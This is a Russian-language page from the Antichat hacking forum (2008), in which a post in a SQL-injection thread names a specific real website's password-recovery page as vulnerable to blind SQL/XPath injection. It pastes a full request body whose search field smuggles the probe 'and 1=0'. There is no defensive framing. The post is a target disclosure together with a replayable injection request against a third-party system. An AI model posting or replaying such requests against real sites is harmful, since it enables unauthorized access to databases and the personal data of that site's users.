ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 24.04.2008, 03:45
XJIOP
Познающий
Регистрация: 23.03.2005
Сообщений: 40
Провел на форуме:
44404

Репутация: 13
Отправить сообщение для XJIOP с помощью ICQ
По умолчанию
Blind SQL/XPath injection for numeric inputs
http://www.video24.ru:80/PasswordRecovery.aspx

request data (post или get хз)
Код:
__EVENTTARGET=111-222-1933email@address.com&__EVENTARGUMENT=111-222-1933email@address.com&__VIEWSTATE=%2FwEPDwUJMzkxNjczNjExD2QWAmYPZBYEAgEPZBYIAgEPFgIeB2NvbnRlbnQFQFZpZGVvMjQgLSDQsNGA0LXQvdC00LAg0Lgg0L%2FQvtC60YPQv9C60LAg0LrQuNC90L4g0YTQuNC70YzQvNC%2B0LJkAgIPFgIfAAWAAtC60LjQvdC%2BINGE0LjQu9GM0LzRiyDRgdC60LDRh9Cw0YLRjCDQv9C%2B0YHQvNC%2B0YLRgNC10YLRjCDQsNGA0LXQvdC00LAg0LrRg9C%2F0LjRgtGMINGC0YDQtdC50LvQtdGA0Ysg0LrQvtC80LXQtNC40Lgg0LHQvtC10LLQuNC60Lgg0LzRg9C70YzRgtGE0LjQu9GM0LzRiyDRg9C20LDRgdGLICDRhNCw0L3RgtCw0YHRgtC40LrQsCDRjdGA0L7RgtC40LrQsCDRgdC10YDQuNCw0LvRiyDQsdC70L7QutCx0LDRgdGC0LXRgNGLINC%2F0YDQtdC80YzQtdGA0YtkAgMPFgIfAAX%2FAdC60LjQvdC%2BINGE0LjQu9GM0LzRiyDRgdC60LDRh9Cw0YLRjCDQv9C%2B0YHQvNC%2B0YLRgNC10YLRjCDQsNGA0LXQvdC00LAg0LrRg9C%2F0LjRgtGMINGC0YDQtdC50LvQtdGA0Ysg0LrQvtC80LXQtNC40Lgg0LHQvtC10LLQuNC60Lgg0LzRg9C70YzRgtGE0LjQu9GM0LzRiyDRg9C20LDRgdGLINGE0LDQvdGC0LDRgdGC0LjQutCwINGN0YDQvtGC0LjQutCwINGB0LXRgNC40LDQu9GLINCx0LvQvtC60LHQsNGB0YLQtdGA0Ysg0L%2FRgNC10LzRjNC10YDRi2QCBA8WAh8ABYMB0LrRg9C%2F0LjRgtGMINGE0LjQu9GM0Lwg0LDRgNC10L3QtNCwINGE0LjQu9GM0LzQsCDRgdC60LDRh9Cw0YLRjCDRhNC40LvRjNC8INC%2F0L7RgdC70LXQtNC90LjQtSDRhNC40LvRjNC80Ysg0L3QvtCy0YvQtSDRhNC40LvRjNC80YtkAgMPZBYQAgQPZBYCAgEPZBYCZg9kFgQCAQ8WAh4EVGV4dAXlAdCi0LDQutC%2B0Lkg0L%2FQvtC70YzQt9C%2B0LLQsNGC0LXQu9GMINC90LUg0YHRg9GJ0LXRgdGC0LLRg9C10YIuPGJyLz7Qn9C%2B0L%2FRgNC%2B0LHRg9C50YLQtSDQtdGJ0LUsINC40LvQuCDQvtCx0YDQsNGC0LjRgtC10YHRjCDQsiDRgdC70YPQttCx0YMg0YLQtdGF0L3QuNGH0LXRgdC60L7QuSA8YSBzdHlsZT0iY29sb3I6b3JhbmdlOyIgaHJlZj0iU3VwcG9ydC5hc3B4Ij7Qv9C%2B0LTQtNC10YDQttC60Lg8YT5kAgUPZBYEAgEPDxYCHghJbWFnZVVybAVNfi9DYXB0Y2hhSW1hZ2UuYXNweD9ndWlkPTdmY2E2MzdhNjcyYzRhMjZiOWNkYzMzYzkzODQwMTg2JndpZHRoPTIwMCZoZWlnaHQ9NzBkZAIDDw9kFgIeCm9ua2V5cHJlc3MFNnJldHVybiBjbGlja09uRW50ZXIodGhpcywnY3RsMDBfY3BoQ29udGVudF9SZWNvdmVyeScpO2QCBg8PFgIeB1Zpc2libGVnZBYEZg8WAh8BZWQCAQ8WAh8BBYUBPGlmcmFtZSBjbGFzcz0nJyBzdHlsZT0naGVpZ2h0OjIyMHB4O3dpZHRoOjE4MHB4OycgZnJhbWVib3JkZXI9MCBzY3JvbGxpbmc9bm8gc3JjPSdodHRwOi8vdmlkZW8yNC5ydS9kYXRhL2FkdnMvNi9pbmRleC5odG0nPjwvaWZyYW1lPmQCCA9kFgICAQ8WAh4LXyFJdGVtQ291bnQCChYUZg9kFgJmDxULACLQn9Cw0YDQuNC2LCDRjyDQu9GO0LHQu9GOINGC0LXQsdGPAzEwMAMxMDAi0J%2FQsNGA0LjQtiwg0Y8g0LvRjtCx0LvRjiDRgtC10LHRjwMxMDAi0J%2FQsNGA0LjQtiwg0Y8g0LvRjtCx0LvRjiDRgtC10LHRjwMxMDADMTAwCTQ5INGA0YPQsQk0OSDRgNGD0LFkAgEPZBYCZg8VCwRIaWdoI9CS0L3Rg9GC0YDQtdC90L3Rj9GPINC40LzQv9C10YDQuNGPAjIyAjIyI9CS0L3Rg9GC0YDQtdC90L3Rj9GPINC40LzQv9C10YDQuNGPAjIyI9CS0L3Rg9GC0YDQtdC90L3Rj9GPINC40LzQv9C10YDQuNGPAjIyAjIyCTQ5INGA0YPQsQk0OSDRgNGD0LFkAgIPZBYCZg8VCwAY0KPQu9GM0YLRgNCw0YTQuNC%
2B0LvQtdGCAjY3AjY3GNCj0LvRjNGC0YDQsNGE0LjQvtC70LXRggI2NxjQo9C70YzRgtGA0LDRhNC40L7Qu9C10YICNjcCNjcJNDkg0YDRg9CxCTQ5INGA0YPQsWQCAw9kFgJmDxULBEhpZ2gK0JLRi9C60YPQvwM0NzQDNDc0CtCS0YvQutGD0L8DNDc0CtCS0YvQutGD0L8DNDc0AzQ3NAk0OSDRgNGD0LEJNDkg0YDRg9CxZAIED2QWAmYPFQsADtCg0YPRgdCw0LvQutCwAzE3MAMxNzAO0KDRg9GB0LDQu9C60LADMTcwDtCg0YPRgdCw0LvQutCwAzE3MAMxNzAJNDkg0YDRg9CxCTQ5INGA0YPQsWQCBQ9kFgJmDxULBEhpZ2gR0K8g0L7RgdGC0LDRjtGB0YwDMzY4AzM2OBHQryDQvtGB0YLQsNGO0YHRjAMzNjgR0K8g0L7RgdGC0LDRjtGB0YwDMzY4AzM2OAk0OSDRgNGD0LEJNDkg0YDRg9CxZAIGD2QWAmYPFQsAJNCb0LjQutCy0LjQtNCw0YbQuNGPICjRgdC10YDQuNGPICAxKQM0NTMDNDUzJNCb0LjQutCy0LjQtNCw0YbQuNGPICjRgdC10YDQuNGPICAxKQM0NTMk0JvQuNC60LLQuNC00LDRhtC40Y8gKNGB0LXRgNC40Y8gIDEpAzQ1MwM0NTMJNDkg0YDRg9CxCTQ5INGA0YPQsWQCBw9kFgJmDxULBEhpZ2gs0J3QsNC%2F0LDQtNC10L3QuNC1INC90LAgMTMt0Lkg0YPRh9Cw0YHRgtC%2B0LoDNTQ4AzU0OCzQndCw0L%2FQsNC00LXQvdC40LUg0L3QsCAxMy3QuSDRg9GH0LDRgdGC0L7QugM1NDgs0J3QsNC%2F0LDQtNC10L3QuNC1INC90LAgMTMt0Lkg0YPRh9Cw0YHRgtC%2B0LoDNTQ4AzU0OAk0OSDRgNGD0LEJNDkg0YDRg9CxZAIID2QWAmYPFQsAJdCR0L7QuSDRgSDRgtC10L3RjNGOIDIgLSDQoNC10LLQsNC90YgCNDkCNDkl0JHQvtC5INGBINGC0LXQvdGM0Y4gMiAtINCg0LXQstCw0L3RiAI0OSXQkdC%2B0Lkg0YEg0YLQtdC90YzRjiAyIC0g0KDQtdCy0LDQvdGIAjQ5AjQ5CTQ5INGA0YPQsQk0OSDRgNGD0LFkAgkPZBYCZg8VCwRIaWdoH9Cg0L7QutC%2B0LLQsNGPINC60YDQsNGB0L7RgtC60LADNTI1AzUyNR%2FQoNC%2B0LrQvtCy0LDRjyDQutGA0LDRgdC%2B0YLQutCwAzUyNR%2FQoNC%2B0LrQvtCy0LDRjyDQutGA0LDRgdC%2B0YLQutCwAzUyNQM1MjUJNDkg0YDRg9CxCTQ5INGA0YPQsWQCCQ9kFgJmDxBkZBYAZAIKD2QWBGYPFgIfAWVkAgEPFgIfAWVkAgsPDxYCHwRnZGQCDA8PFgIfBGhkZAINDw8WBB8BBRLQmtC40L3QvtGC0LXQsNGC0YAeC05hdmlnYXRlVXJsBRhodHRwOi8vY2luZW1hLmxvY2FsaG9zdC9kZBgBBR9jdGwwMCRjcGhDb250ZW50JE11bHRpVmlld0Zvcm1zDw9kZmSgE12fR%2FaXraHX3N%2FRHjIlWVF1Dw%3D%3D&spos=111-222-1933email@address.com&ctl00%24SearchText=111-222-1933email@address.com+and+1%3D0&ctl00%24cphContent%24UserNameText=111-222-1933email@address.com&ctl00%24cphContent%24ctrlCaptcha%24tbCode=111-222-1933email@address.com&ctl00%24cphContent%24Recovery=111-222-1933email@address.com&__EVENTVALIDATION=%2FwEWCAKL55VmAsCH3ZkDAp3575QBAvTb06MHApf5r%2BgPAvKJmnkCvb2C%2BQkC9qacmAFWO%2BU%2BG8WwJuHrrDX%2BErr05%2B2fSQ%3D%3D
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ